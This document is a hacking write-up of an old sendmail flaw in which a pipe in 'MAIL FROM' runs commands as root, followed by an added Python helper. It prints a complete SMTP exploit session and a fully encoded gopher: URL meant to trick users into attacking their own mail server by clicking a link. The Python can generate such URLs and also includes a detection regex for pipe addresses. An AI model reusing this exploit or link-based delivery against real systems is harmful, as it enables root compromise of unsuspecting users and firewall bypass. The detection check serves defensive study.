What: Some versions of sendmail will allow 'MAIL FROM' to be a pipe.

Who: ??

When: Found 1996, though the hole itself is far older than that.

Description: Some versions of sendmail will allow 'MAIL FROM' to be a pipe, allowing the user to execute commands as root (through the pipe): whatever sendmail writes back to that sender address, mail headers included, becomes the standard input of the command after the '|', and sendmail runs it with its own privileges.

A nice feature of this hack is that you can set up links that cause a browser to open a TCP connection to a host and port you choose and send text you choose. A gopher: URL does exactly that: the browser connects to the host and port in the URL and writes the (decoded) selector to the socket as-is, so the link can point at port 25. In other words, you can put up a link that, if someone running a bugged version of sendmail clicks on it, runs those commands on their own machine. This can get around firewalls, as long as the person inside the firewall actually chooses that link! This is an example of using a mailto: or gopher: link to trick someone into giving away root access by clicking on a web link.

First, here is how you would do it manually, telnetting to the sendmail port (25):

--------------------------------------------------
MAIL FROM: |/usr/bin/tail|/bin/sh
RCPT TO: root
DATA
From: root@localhost
To: root@localhost
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen

Hi there. Wanna play ball?

#!/bin/sh
PATH=/bin:/usr/bin:/usr/ucb
export PATH
echo Running Netscape inside a firewall is a security hole. > /tmp/bug
id >> /tmp/bug
hostname >> /tmp/bug
ps -aux >> /tmp/bug
mail root@localhost < /tmp/bug
#9
#10
.
QUIT
--------------------------------------------------

Some explanation: The MAIL FROM is a pipe through tail to /bin/sh. Without any arguments, tail prints the last ten lines of its input, and only those ten lines reach the shell. This way we don't try to execute any of the mail headers in the shell. That's what the lines "#9" and "#10" are for: they are placeholders that pad the body so that the last ten lines are exactly the script we want to execute, from "#!/bin/sh" down to "#10". (Notice that the # symbol makes the line a shell comment, so the padding is harmless.) If you lengthen or shorten the script, adjust the padding so the count stays at ten; otherwise the shell will see the line "Hi there. Wanna play ball?" or a header before the script. The lone "." ends the DATA section and is never part of what tail sees.

As a URL:

--------------------------------------------------
gopher://localhost:25/0HELO%0AMAIL%20FROM%3A%20%7C%2Fusr%2Fbin%2Ftail%7C%2Fbin%2Fsh%0ARCPT%20TO%3A%20root%0ADATA%0AFrom%3A%20root%40localhost%0ATo%3A%20root%40localhost%0AReturn%2DReceipt%2DTo%3A%20%7Cfoobar%0ASubject%3A%20This%20is%20a%20large%20hole%20in%20the%20ground%2E%0AX%2DDisclaimer%3A%20We%20take%20no%20responsibility%20for%20what%20might%20happen%0A%0AHi%20there%2E%20Wanna%20play%20ball%3F%0A%0A%23%21%2Fbin%2Fsh%0APATH%3D%2Fbin%3A%2Fusr%2Fbin%3A%2Fusr%2Fucb%0Aexport%20PATH%0Aecho%20Running%20Netscape%20inside%20a%20firewall%20is%20a%20security%20hole%2E%20%3E%20%2Ftmp%2Fbug%0Aid%20%3E%3E%20%2Ftmp%2Fbug%0Ahostname%20%3E%3E%20%2Ftmp%2Fbug%0Aps%20%2Daux%20%3E%3E%20%2Ftmp%2Fbug%0Amail%20root%40localhost%20%3C%20%2Ftmp%2Fbug%0A%23%39%0A%23%31%30%0A%2E%0AQUIT%0A
--------------------------------------------------

The "0" after the "/" is the gopher item type; everything after it is the selector, which the browser decodes and sends to port 25 verbatim. So the URL is simply the session above with a HELO in front, every character that is not a letter percent-encoded, and every line ending written as %0A. Two things follow from that: it only works against a server that accepts a bare line feed in place of CRLF, and with localhost as the host it is the victim's own sendmail, on the machine whose browser followed the link, that gets the commands.
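The encoding and the tail trick, worked through as an added example in Python (this is not code from the original page or from sendmail): it decodes the gopher URL above back into the SMTP session a browser would send, re-encodes that session with the same letters-only escaping the page's URL uses, shows which lines tail hands to /bin/sh with and without the "#9"/"#10" padding, and scans a transcript for pipe addresses. The session text is a constructed copy of the page's transcript, not traffic captured from a mail server; `find_pipe_addresses` is a detection check of mine, and the assumption that what sendmail writes to the pipe ends with the submitted message is mine as well.

```python
"""Added example, not code from the original page or from sendmail: decode the
page's gopher URL into the SMTP session a browser sends, re-encode it with the
page's letters-only escaping, show which lines `tail` hands to /bin/sh, and
flag pipe addresses in a transcript. SESSION is a constructed copy of the
page's transcript, not traffic captured from a mail server."""
import re

PAGE_URL = (  # the URL exactly as it appears on the page
    "gopher://localhost:25/0HELO%0AMAIL%20FROM%3A%20%7C%2Fusr%2Fbin%2Ftail%7C%2Fbin%2Fsh%0A"
    "RCPT%20TO%3A%20root%0ADATA%0AFrom%3A%20root%40localhost%0ATo%3A%20root%40localhost%0A"
    "Return%2DReceipt%2DTo%3A%20%7Cfoobar%0ASubject%3A%20This%20is%20a%20large%20hole%20in%20the%20ground%2E%0A"
    "X%2DDisclaimer%3A%20We%20take%20no%20responsibility%20for%20what%20might%20happen%0A%0A"
    "Hi%20there%2E%20Wanna%20play%20ball%3F%0A%0A%23%21%2Fbin%2Fsh%0APATH%3D%2Fbin%3A%2Fusr%2Fbin%3A%2Fusr%2Fucb%0A"
    "export%20PATH%0Aecho%20Running%20Netscape%20inside%20a%20firewall%20is%20a%20security%20hole%2E%20%3E%20%2Ftmp%2Fbug%0A"
    "id%20%3E%3E%20%2Ftmp%2Fbug%0Ahostname%20%3E%3E%20%2Ftmp%2Fbug%0Aps%20%2Daux%20%3E%3E%20%2Ftmp%2Fbug%0A"
    "mail%20root%40localhost%20%3C%20%2Ftmp%2Fbug%0A%23%39%0A%23%31%30%0A%2E%0AQUIT%0A"
)

SESSION = """\
HELO
MAIL FROM: |/usr/bin/tail|/bin/sh
RCPT TO: root
DATA
From: root@localhost
To: root@localhost
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen

Hi there. Wanna play ball?

#!/bin/sh
PATH=/bin:/usr/bin:/usr/ucb
export PATH
echo Running Netscape inside a firewall is a security hole. > /tmp/bug
id >> /tmp/bug
hostname >> /tmp/bug
ps -aux >> /tmp/bug
mail root@localhost < /tmp/bug
#9
#10
.
QUIT
"""


def gopher_escape(selector):
    """Percent-encode every byte except ASCII letters, as the page's URL does."""
    return "".join(chr(b) if chr(b).isascii() and chr(b).isalpha() else "%%%02X" % b
                   for b in selector.encode("utf-8"))


def gopher_url(host, port, selector, item_type="0"):
    """A gopher client opens host:port and writes the decoded selector as-is."""
    return "gopher://%s:%d/%s%s" % (host, port, item_type, gopher_escape(selector))


def gopher_selector(url):
    """(host, port, decoded selector): what following the link makes the browser send."""
    host, port, escaped = re.fullmatch(r"gopher://([^/:]+)(?::(\d+))?/.(.*)", url, re.S).groups()
    raw = re.sub(rb"%([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]),
                 escaped.encode("ascii"))
    return host, int(port or 70), raw.decode("latin-1")


def data_section(session):
    """The message as submitted: everything between DATA and the lone '.' terminator."""
    lines = session.split("\n")
    start = lines.index("DATA") + 1
    return "\n".join(lines[start:lines.index(".", start)]) + "\n"


def shell_input(session):
    """What /bin/sh reads through '|/usr/bin/tail|/bin/sh': tail's default last 10 lines.
    Assumes (not stated on the page) that what sendmail writes to the pipe ends with the
    submitted message, so any headers sendmail prepends are dropped by tail anyway."""
    return "".join(data_section(session).splitlines(keepends=True)[-10:])


# Detection check (mine, not the page's): an envelope command or header whose
# address starts with '|' is a pipe, which a mail server should never honour.
PIPE_FIELD = re.compile(r"^(MAIL FROM|RCPT TO|Return-Receipt-To)\s*:\s*<?\s*(\|[^\r\n]*)",
                        re.I | re.M)


def find_pipe_addresses(session):
    return [(m.group(1), m.group(2)) for m in PIPE_FIELD.finditer(session)]


if __name__ == "__main__":
    host, port, sent = gopher_selector(PAGE_URL)
    assert sent == SESSION and gopher_url(host, port, sent) == PAGE_URL
    print("browser connects to %s:%d and sends:\n%s" % (host, port, sent))
    print("tail hands /bin/sh:\n" + shell_input(SESSION))
    print("without the #9/#10 padding the shell would first see:",
          shell_input(SESSION.replace("#9\n#10\n", "")).splitlines()[0])
    print("pipe addresses:", find_pipe_addresses(SESSION))
```

Running it prints the decoded session, the ten lines the shell actually executes (starting at "#!/bin/sh"), the line the shell would see first if the two padding lines were dropped ("Hi there. Wanna play ball?"), and the two pipe addresses in the transcript. The same regex over a server's SMTP logs or a mail queue is the quick check for whether anyone has been sending such sessions to a host.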